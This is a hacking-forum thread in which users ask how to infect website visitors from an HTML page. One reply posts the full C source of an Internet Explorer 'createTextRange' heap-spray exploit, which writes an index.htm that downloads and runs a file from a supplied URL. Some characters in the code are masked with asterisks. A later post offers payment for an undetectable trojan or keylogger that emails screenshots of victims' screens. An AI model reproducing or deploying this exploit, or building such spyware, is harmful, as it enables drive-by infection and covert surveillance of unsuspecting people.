Ok, does anyone know where I can find a program that will decode an exe into html code so that when the site is visited, the visitor is infected? I think it has somthing to do with an .EML bug. I read about this a while ago and could really really use this right now.
??????????????????????????????????????????????????Originally Posted by jokr004
HTML > EXE
I think you are looking for something with the taste of "Xploit"
* words. Remote Code Execution.
Remote code execution can be in anything, not just java. I think what he was meaning from remote code execution was remote code execution from an exploit, not remote code execution as in running a java applet. In reply to the first post, there is no way to just embed executable code into a html file, and even java applets are limited, and run in a "sandbox", without any access to local data. The only way to execute code from just an html file is by using exploits. Here is the latest version of the IE exploit, (btw it's not php code, it's c code).
[PHP]/*
*
* Internet Explorer "createTextRang" Download Shellcoded Exploit (2)
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-0*-2006
*
* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched
*
* E-Mail: atmaca@***mail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* ****** to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene
*
*/
/*
*
* This one is more faster than all released createTextRange exploits
* because it uses last version of SkyLined's heap spraying code,
* special *0x goes to him.
*
*/
#include <windows.h>
#include <stdio.h>
#define BUF_LEN 0x800
#define FILE_NAME "index.htm"
char body*[] =
"<input type=\"checkbox\" id=\"blah\">\r\n"
"<SCRIPT language=\"javascript\">\r\n\r\n"
"\tvar heapSprayToAddress = 0x*c0*74c2;\r\n\r\n"
"\tvar payLoadCode = unescape(\"%u*0*0%u*0*0%u*0*0\" +\r\n"
"\t\"%uCCE*%u0000%u5F00%u56E8%u0000%u8*00%u50C*%u8E68%u0E4E%uE8EC\" +\r\n"
"\t\"%u0060%u0000%uC***%uB*66%u6E6F%u685*%u7275%u6D6C%uFF54%u50D0\" +\r\n"
"\t\"%u*668%u2F*A%uE870%u0046%u0000%uC***%u5*5*%u*78D%u8D56%u0877\" +\r\n"
"\t\"%u5*56%uD0FF%u685*%uFE*8%u0E8A%u2DE8%u0000%u5*00%uFF57%u**D0\" +\r\n"
"\t\"%u4*C*%u*0*0%u685*%uD87E%u7*E2%u**E8%u0000%uFF00%u55D0%u6456\" +\r\n"
"\t\"%u*0A*%u0000%u8B00%u0C40%u708B%uAD*C%u688B%u8*08%u5EE8%uC*5D\" +\r\n"
"\t\"%u555*%u5756%u6C8B%u*824%u458B%u8B*C%u0554%u0*78%u8BEA%u*84A\" +\r\n"
"\t\"%u5A8B%u0*20%uE*EB%u4**5%u*48B%u0*8B%u**EE%uFCFF%uC0**%u*8AC\" +\r\n"
"\t\"%u74E0%uC*07%u0DCF%uC70*%uF2EB%u7C*B%u*424%uE*75%u5A8B%u0*24\" +\r\n"
"\t\"%u66EB%u0C8B%u8B4B%u*C5A%uEB0*%u048B%u0*8B%uE*E8%u0002%u0000\" +\r\n"
"\t\"%uC0**%uEA8*%u5E5F%u5B5D%uE8C*%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n"
"\t\"%u0065";
char body2[] =
"\r\n\r\n\tvar heapBlockSize = 0x400000;\r\n\r\n"
"\tvar payLoadSize = payLoadCode.length * 2;\r\n\r\n"
"\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x*8);\r\n\r\n"
"\tvar spraySlide = unescape(\"%u*0*0%u*0*0\");\r\n"
"\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\r\n\r\n"
"\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\r\n\r\n"
"\tmemory = new Array();\r\n\r\n"
"\tfor (i=0;i<heapBlocks;i++)\r\n"
"\t{\r\n\t\tmemory[i] = spraySlide + payLoadCode;\r\n\t}\r\n\r\n"
"\tvar r = document.getElementById('blah').createTextRange();\r\n\r\n"
"\tfunction getSpraySlide(spraySlide, spraySlideSize)\r\n"
"\t{\r\n\t\twhile (spraySlide.length*2<spraySlideSize)\r\n\t\t{\r\n"
"\t\t\tspraySlide += spraySlide;\r\n\t\t}\r\n"
"\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\r\n"
"\t\treturn spraySlide;\r\n"
"\t}\r\n\r\n</script>";
int main(int argc,char *argv[])
{
if (argc < 2)
{
printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)");
printf("\nCoded by ATmaCA (atmaca[at]***mail.com)\n");
printf("\nUsage:\n");
printf("ie_exp <WebUrl>\n");
return 0;
}
FILE *File;
char *pszBuffer;
char *web = argv[*];
char *pu = "%u";
char u_t[5];
char *utf*6 = (char*)malloc(strlen(web)*5);
if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
printf("\n [Err:] fopen()");
exit(*);
}
pszBuffer = (char*)malloc(BUF_LEN);
memcpy(pszBuffer,body*,sizeof(body*)-*);
memset(utf*6,'\0',strlen(web)*5);
for (unsigned int i=0;i<strlen(web);i=i+2)
{
sprintf(u_t,"%s%.2x%.2x", pu, web[i+*], web[i]);
strcat(utf*6,u_t);
}
strcat(pszBuffer,utf*6);
strcat(pszBuffer,"%u0000\");");
strcat(pszBuffer,body2);
fwrite(pszBuffer, BUF_LEN, *,File);
fclose(File);
printf("\n\n" FILE_NAME " has been created in the current directory.\n");
return *;
}[/PHP]
im looking for undetectable trojan that can be ran in the background of website like remote code execution i will pay someone a good ammount if they can make this all i need it mainly for is to see screenshots of victims pc maybe that can be something like a keylogger that sends screenshots to email
Posting Permissions
Reply With Quote